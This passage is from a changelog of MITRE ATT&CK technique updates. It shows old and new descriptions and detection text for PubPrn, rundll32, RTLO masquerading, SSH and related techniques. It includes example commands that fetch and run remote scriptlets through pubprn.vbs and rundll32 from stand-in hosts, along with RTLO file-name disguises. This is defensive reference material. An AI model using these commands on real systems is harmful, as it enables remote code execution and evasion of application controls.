>o Active Directory Domain Services. The script is signed by >Command Shell](https://attack.mitre.org/techniques/T1059/003
>Microsoft and can be used to proxy execution from a remote s>) via <code>Cscript.exe</code>. For example, the following c
>ite.(Citation: Enigma0x3 PubPrn Bypass) An example command i>ode publishes a printer within the specified domain: <code>c
>s <code>cscript C[:]\Windows\System32\Printing_Admin_Scripts>script pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Co
>\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/>m</code>.(Citation: pubprn)  Adversaries may abuse PubPrn to
>hi.png</code>.> execute malicious payloads hosted on remote sites.(Citation
 >: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the
 > second <code>script:</code> parameter to reference a script
 >let file (.sct) hosted on a remote site. An example command 
 >is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/fo
 >lder/file.sct</code>. This behavior may bypass signature val
 >idation restrictions and application control solutions that 
 >do not account for abuse of this script.  In later versions 
 >of Windows (10+), <code>PubPrn.vbs</code> has been updated t
 >o prevent proxying execution from a remote site. This is don
 >e by limiting the protocol specified in the second parameter
 > to <code>LDAP://</code>, vice the <code>script:</code> moni
 >ker which could be used to reference remote code via HTTP(S)
 >.

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Atul Nair, Qualys']
x_mitre_defense_bypassed['Digital Certificate Validation', 'Application Control']
values_changed
STIX FieldOld valueNew Value
modified2020-06-08 23:36:30.648000+00:002021-09-01 00:57:01.161000+00:00
descriptionAdversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).
external_references[1]['source_name']Enigma0x3 PubPrn Bypasspubprn
external_references[1]['description']Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.
external_references[1]['url']https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Enigma0x3 PubPrn Bypass', 'description': 'Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.', 'url': 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'}

[T1021] Remote Services

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to log into a service specifically desig>g/techniques/T1078) to log into a service specifically desig
>ned to accept remote connections, such as telnet, SSH, and V>ned to accept remote connections, such as telnet, SSH, and V
>NC. The adversary may then perform actions as the logged-on >NC. The adversary may then perform actions as the logged-on 
>user.  In an enterprise environment, servers and workstation>user.  In an enterprise environment, servers and workstation
>s can be organized into domains. Domains provide centralized>s can be organized into domains. Domains provide centralized
> identity management, allowing users to login using one set > identity management, allowing users to login using one set 
>of credentials across the entire network. If an adversary is>of credentials across the entire network. If an adversary is
> able to obtain a set of valid domain credentials, they coul> able to obtain a set of valid domain credentials, they coul
>d login to many different machines using remote access proto>d login to many different machines using remote access proto
>cols such as secure shell (SSH) or remote desktop protocol (>cols such as secure shell (SSH) or remote desktop protocol (
>RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote D>RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote D
>esktop Services)>esktop Services)  Legitimate applications (such as [Software
 > Deployment Tools](https://attack.mitre.org/techniques/T1072
 >) and other administrative programs) may utilize [Remote Ser
 >vices](https://attack.mitre.org/techniques/T1021) to access 
 >remote hosts. For example, Apple Remote Desktop (ARD) on mac
 >OS is native software used for remote management. ARD levera
 >ges a blend of protocols, including [VNC](https://attack.mit
 >re.org/techniques/T1021/005) to send the screen and control 
 >buffers and [SSH](https://attack.mitre.org/techniques/T1021/
 >004) for secure file transfer.(Citation: Remote Management M
 >DM macOS)(Citation: Kickstart Apple Remote Desktop commands)
 >(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries
 > can abuse applications such as ARD to gain remote code exec
 >ution and perform lateral movement. In versions of macOS pri
 >or to 10.14, an adversary can escalate an SSH session to an 
 >ARD session which enables an adversary to accept TCC (Transp
 >arency, Consent, and Control) prompts without user interacti
 >on and gain access to data.(Citation: FireEye 2019 Apple Rem
 >ote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstar
 >t Apple Remote Desktop commands)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Dan Borges, @1njection']
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 12:25:03.251000+00:002021-10-15 14:15:07.272000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
x_mitre_detectionCorrelate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. Use of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. In macOS, you can review logs for "screensharingd" and "Authentication" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Remote Management MDM macOS', 'description': 'Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.', 'url': 'https://support.apple.com/en-us/HT209161'}
external_references{'source_name': 'Kickstart Apple Remote Desktop commands', 'description': 'Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.', 'url': 'https://support.apple.com/en-us/HT201710'}
external_references{'source_name': 'Apple Remote Desktop Admin Guide 3.3', 'description': 'Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.', 'url': 'https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf'}
external_references{'source_name': 'FireEye 2019 Apple Remote Desktop', 'description': 'Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html'}
external_references{'source_name': 'Lockboxx ARD 2019', 'description': 'Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.', 'url': 'http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html'}
external_references{'source_name': 'Apple Unified Log Analysis Remote Login and Screen Sharing', 'description': 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.', 'url': 'https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins'}

[T1018] Remote System Discovery

Current version: 3.2

Version changed from: 3.1 → 3.2


Old Description
New Description
t1Adversaries may attempt to get a listing of other systems byt1Adversaries may attempt to get a listing of other systems by
> IP address, hostname, or other logical identifier on a netw> IP address, hostname, or other logical identifier on a netw
>ork that may be used for Lateral Movement from the current s>ork that may be used for Lateral Movement from the current s
>ystem. Functionality could exist within remote access tools >ystem. Functionality could exist within remote access tools 
>to enable this, but utilities available on the operating sys>to enable this, but utilities available on the operating sys
>tem could also be used such as  [Ping](https://attack.mitre.>tem could also be used such as  [Ping](https://attack.mitre.
>org/software/S0097) or <code>net view</code> using [Net](htt>org/software/S0097) or <code>net view</code> using [Net](htt
>ps://attack.mitre.org/software/S0039). Adversaries may also >ps://attack.mitre.org/software/S0039). Adversaries may also 
>use local host files (ex: <code>C:\Windows\System32\Drivers\>use local host files (ex: <code>C:\Windows\System32\Drivers\
>etc\hosts</code> or <code>/etc/hosts</code>) in order to dis>etc\hosts</code> or <code>/etc/hosts</code>) in order to dis
>cover the hostname to IP address mappings of remote systems.>cover the hostname to IP address mappings of remote systems.
>   Specific to macOS, the <code>bonjour</code> protocol exis>  
>ts to discover additional Mac-based systems within the same  
>broadcast domain. 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:40:23.368000+00:002021-10-15 15:30:00.172000+00:00
descriptionAdversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
x_mitre_version3.13.2

[T1091] Replication Through Removable Media

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:45:59.638000+00:002021-07-20 02:18:04.581000+00:00
x_mitre_version1.01.1

[T1036.002] Masquerading: Right-to-Left Override

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use the right-to-left override (RTLO or RLO)t1Adversaries may abuse the right-to-left override (RTLO or RL
> character (U+202E) as a means of tricking a user into execu>O) character (U+202E) to disguise a string and/or file name 
>ting what they think is a benign file type but is actually e>to make it appear benign. RTLO is a non-printing Unicode cha
>xecutable code. RTLO is a non-printing character that causes>racter that causes the text that follows it to be displayed 
> the text that follows it to be displayed in reverse.(Citati>in reverse. For example, a Windows screensaver executable na
>on: Infosecinstitute RTLO Technique) For example, a Windows >med <code>March 25 \u202Excod.scr</code> will display as <co
>screensaver executable named <code>March 25 \u202Excod.scr</>de>March 25 rcs.docx</code>. A JavaScript file named <code>p
>code> will display as <code>March 25 rcs.docx</code>. A Java>hoto_high_re\u202Egnp.js</code> will be displayed as <code>p
>Script file named <code>photo_high_re\u202Egnp.js</code> wil>hoto_high_resj.png</code>.(Citation: Infosecinstitute RTLO T
>l be displayed as <code>photo_high_resj.png</code>.  A commo>echnique)  Adversaries may abuse the RTLO character as a mea
>n use of this technique is with [Spearphishing Attachment](h>ns of tricking a user into executing what they think is a be
>ttps://attack.mitre.org/techniques/T1566/001)/[Malicious Fil>nign file type. A common use of this technique is with [Spea
>e](https://attack.mitre.org/techniques/T1204/002) since it c>rphishing Attachment](https://attack.mitre.org/techniques/T1
>an trick both end users and defenders if they are not aware >566/001)/[Malicious File](https://attack.mitre.org/technique
>of how their tools display and render the RTLO character. Us>s/T1204/002) since it can trick both end users and defenders
>e of the RTLO character has been seen in many targeted intru> if they are not aware of how their tools display and render
>sion attempts and criminal activity.(Citation: Trend Micro P> the RTLO character. Use of the RTLO character has been seen
>LEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be> in many targeted intrusion attempts and criminal activity.(
> used in the Windows Registry as well, where regedit.exe dis>Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO C
>plays the reversed characters but the command line tool reg.>yber Crime) RTLO can be used in the Windows Registry as well
>exe does not by default.>, where regedit.exe displays the reversed characters but the
 > command line tool reg.exe does not by default.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 20:16:36.316000+00:002021-10-14 21:01:59.733000+00:00
descriptionAdversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique) Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
x_mitre_version1.01.1

[T1564.006] Hide Artifacts: Run Virtual Instance

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-06 19:03:40.330000+00:002021-10-14 22:21:59.708000+00:00
x_mitre_detectionConsider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances. Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages "all"). Monitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Shadowbunny VM Defense Evasion', 'description': 'Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.', 'url': 'https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/'}
x_mitre_contributorsJohann Rehberger

[T1218.011] Signed Binary Proxy Execution: Rundll32

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse rundll32.exe to proxy execution of malt1Adversaries may abuse rundll32.exe to proxy execution of mal
>icious code. Using rundll32.exe, vice executing directly (i.>icious code. Using rundll32.exe, vice executing directly (i.
>e. [Shared Modules](https://attack.mitre.org/techniques/T112>e. [Shared Modules](https://attack.mitre.org/techniques/T112
>9)), may avoid triggering security tools that may not monito>9)), may avoid triggering security tools that may not monito
>r execution of the rundll32.exe process because of allowlist>r execution of the rundll32.exe process because of allowlist
>s or false positives from normal operations. Rundll32.exe is>s or false positives from normal operations. Rundll32.exe is
> commonly associated with executing DLL payloads.  Rundll32.> commonly associated with executing DLL payloads (ex: <code>
>exe can also be used to execute [Control Panel](https://atta>rundll32.exe {DLLname, DLLfunction}</code>).  Rundll32.exe c
>ck.mitre.org/techniques/T1218/002) Item files (.cpl) through>an also be used to execute [Control Panel](https://attack.mi
> the undocumented shell32.dll functions <code>Control_RunDLL>tre.org/techniques/T1218/002) Item files (.cpl) through the 
></code> and <code>Control_RunDLLAsUser</code>. Double-clicki>undocumented shell32.dll functions <code>Control_RunDLL</cod
>ng a .cpl file also causes rundll32.exe to execute. (Citatio>e> and <code>Control_RunDLLAsUser</code>. Double-clicking a 
>n: Trend Micro CPL)  Rundll32 can also be used to execute sc>.cpl file also causes rundll32.exe to execute. (Citation: Tr
>ripts such as JavaScript. This can be done using a syntax si>end Micro CPL)  Rundll32 can also be used to execute scripts
>milar to this: <code>rundll32.exe javascript:"\..\mshtml,Run> such as JavaScript. This can be done using a syntax similar
>HTMLApplication ";document.write();GetObject("script:https[:> to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLA
>]//www[.]example[.]com/malicious.sct")"</code>  This behavio>pplication ";document.write();GetObject("script:https[:]//ww
>r has been seen used by malware such as Poweliks. (Citation:>w[.]example[.]com/malicious.sct")"</code>  This behavior has
> This is Security Command Line Confusion)> been seen used by malware such as Poweliks. (Citation: This
 > is Security Command Line Confusion)  Adversaries may also a
 >ttempt to obscure malicious code from analysis by abusing th
 >e manner in which rundll32.exe loads DLL function names. As 
 >part of Windows compatibility support for various character 
 >sets, rundll32.exe will first check for wide/Unicode then AN
 >SI character-supported functions before loading the specifie
 >d function (e.g., given the command <code>rundll32.exe Examp
 >leDLL.dll, ExampleFunction</code>, rundll32.exe would first 
 >attempt to execute <code>ExampleFunctionW</code>, or failing
 > that <code>ExampleFunctionA</code>, before loading <code>Ex
 >ampleFunction</code>). Adversaries may therefore obscure mal
 >icious code by creating multiple identical exported function
 > names and appending <code>W</code> and/or <code>A</code> to
 > harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(
 >Citation: Github NoRunDll)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-01-20 18:12:11.843000+00:002021-10-14 21:45:53.057000+00:00
descriptionAdversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)
x_mitre_detectionUse process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Attackify Rundll32.exe Obscurity', 'description': 'Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.', 'url': 'https://www.attackify.com/blog/rundll32_execution_order/'}
external_references{'source_name': 'Github NoRunDll', 'description': 'gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.', 'url': 'https://github.com/gtworek/PSBits/tree/master/NoRunDll'}
x_mitre_contributorsGareth Phillips, Seek Ltd.
x_mitre_data_sourcesFile: File Metadata

[T1606.002] Forge Web Credentials: SAML Tokens

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:29:27.290000+00:002021-09-20 16:47:19.173000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJen Burns, HubSpot
x_mitre_platformsIaaS

[T1021.004] Remote Services: SSH

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to log into remote machines using Secure>g/techniques/T1078) to log into remote machines using Secure
> Shell (SSH). The adversary may then perform actions as the > Shell (SSH). The adversary may then perform actions as the 
>logged-on user.  SSH is a protocol that allows authorized us>logged-on user.  SSH is a protocol that allows authorized us
>ers to open remote shells on other computers. Many Linux and>ers to open remote shells on other computers. Many Linux and
> macOS versions come with SSH installed by default, although> macOS versions come with SSH installed by default, although
> typically disabled until the user enables it. The SSH serve> typically disabled until the user enables it. The SSH serve
>r can be configured to use standard password authentication >r can be configured to use standard password authentication 
>or public-private keypairs in lieu of or in addition to a pa>or public-private keypairs in lieu of or in addition to a pa
>ssword. In this authentication scenario, the user’s public k>ssword. In this authentication scenario, the user’s public k
>ey must be in a special file on the computer running the ser>ey must be in a special file on the computer running the ser
>ver that lists which keypairs are allowed to login as that u>ver that lists which keypairs are allowed to login as that u
>ser.(Citation: SSH Secure Shell)>ser.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 23:43:46.977000+00:002021-10-15 14:15:06.853000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.(Citation: SSH Secure Shell)Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.
external_references[2]['source_name']SSH Secure ShellApple Unified Log Analysis Remote Login and Screen Sharing
external_references[2]['description']SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
external_references[2]['url']https://www.ssh.com/sshhttps://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
x_mitre_detectionUse of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. On macOS systems log show --predicate 'process = "sshd"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) On Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.
x_mitre_version1.01.1

[T1584.004] Compromise Infrastructure: Server

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
values_changed
